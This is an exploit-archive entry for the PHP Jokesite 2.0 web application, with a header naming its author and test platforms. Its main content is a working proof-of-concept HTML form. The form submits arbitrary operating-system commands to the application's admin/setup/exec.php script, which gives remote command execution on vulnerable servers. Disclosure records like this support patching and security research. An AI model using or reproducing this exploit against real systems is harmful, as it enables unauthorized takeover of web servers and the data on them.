PHP Jokesite V 2.0 exec Command Exploit

2010-04-01T00:00:00
ID 1337DAY-ID-11565
Type zdt
Reporter indoushka
Modified 2010-04-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =======================================
PHP Jokesite V 2.0 exec Command Exploit
=======================================

========================================================================================                 
| # Title    : PHP Jokesite V 2.0 exec command EXploit           
| # Author   : indoushka                                                              
| # email    : [email protected]                                                  
| # Home     : www.iqs3cur1ty.com                                                                                                                                                                                                                 
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : execcommand                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  :
  
<form action="http://127.0.0.1/php-jokesite_v2/admin/setup/exec.php" method="post">
<input type="hidden" name="action" value="exec">
 
<table align="center">
 
<tr>
 
<td>Enter command to exec:</td>
</tr>
 
<tr>
<td>
<textarea name="execcommand" cols="60" rows="3">
</textarea>
</td>
 
</tr>
<tr>
<td><input type="submit" name="go" value="Go">
</td>
 
</tr>
 
</table>
 
</form>



#  0day.today [2018-03-01]  #